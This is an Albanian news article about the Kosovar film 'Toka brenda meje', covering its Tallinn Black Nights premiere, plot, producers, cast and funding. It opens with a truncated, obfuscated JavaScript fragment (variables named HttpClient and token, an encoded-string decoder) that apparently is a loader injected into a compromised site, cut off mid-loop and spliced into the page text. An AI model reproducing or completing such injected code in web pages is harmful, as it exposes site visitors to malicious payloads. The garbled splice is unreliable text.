;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Filmi kosovar “Toka brenda meje”, me premierë në “Tallin Black Nights” në Estoni

By

Filmi i metrazhit të gjatë artistik “Toka brenda meje” me regji nga Fisnik Maxhuni, do të shfaqë premierën në Festivalin e Filmit “Tallin Black Nights” në Estoni, bën të ditur Qendra Kinematografike e Kosovës përmes një njoftimi në rrejte sociale.

Filmi do të shfaqet, në njërin prej festivaleve më të mëdha të filmit në Evropën Veriore, njëherit edhe festival i kategorisë “A”, i cili do të mbahet përgjatë datave 11-27 nëntor 2022.

Filmi përcjell Remon, i cili pas disa vitesh në mërgim kthehet nga Gjeneva, në vendlindjen e tij në Kosovë.

Dashuria e tij e parë, Una, e thërret për ta informuar për vdekjen e afërt të patriarkut të familjes dhe zhvarrosjen në një varri masiv. Duke u kthyer në fshatin e tij pas një mungese dhjetëvjeçare, Remo do të duhet të përballet me të kaluarën dhe të tashmen e tij.

Producent të filmit, janë Valon Bajgora, Yll Uka, Britta Rindelaub dhe Thomas Reichlin. Në rolet kryesore luajnë: Florist Bajgora, Luana Bajrami, Armend Smajli, Luan Jaha, Arta Mucaj, Irena Aliu, Kumrije Hoxha, Meli Qena dhe Çun Lajçi.

“Toka brenda meje” është realizuar me mbështetjen e Qendrës Kinematografike të Kosovës, Federal Office for Culture, Cineforom, Loterie romande, Media Desk Suisse, Suissimage dhe FOCAL, në bashkprodhim me RTS Radio Television Suisse.
May be an image of 3 people and outdoors

Artikuj të ngjashëm